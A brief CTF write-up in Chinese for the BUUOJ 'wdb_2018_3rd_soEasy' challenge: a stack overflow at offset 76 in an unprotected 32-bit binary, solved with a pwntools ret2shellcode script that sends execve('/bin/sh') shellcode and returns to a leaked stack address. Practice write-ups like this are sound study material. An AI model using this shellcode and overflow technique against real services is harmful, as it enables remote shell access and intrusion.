wdb_2018_pwn_3rd-soeasy
wdb_2018_3rd_soEasy查看32位啥都没开,输出一个栈地址。存在溢出偏移为76idaret2shellcode脚本# -*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import *
from struct import pack
import time
context.log_level='debug'
context.arch = "amd64"
my_u64 = lambda x: u64(x.ljust(8, '\0'))
#libc=ELF('libc-2.23.so')
a=0
if a==1:
#p = process(['./wdb_2018_3rd_soEasy'],env={"LD_PRELOAD":"./libc-2.23.so"})
p=process('wdb_2018_3rd_soEasy')
else:
p=remote('node3.buuoj.cn',26580)
p.recvuntil('>')
stack=int(p.recv(10),16)
success('stack addr: '+hex(stack))
#shellcode=asm(shellcraft.sh())
#shellcode = asm('push 0x0068732f;push 0x6e69622f;mov ebx, esp;mov eax, 0xb;xor ecx, ecx;xor edx, edx;int 0x80')
shellcode = b"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
payload=shellcode.ljust(76,b'a')+p32(stack)
p.sendline(payload)
p.interactive()
页:
[1]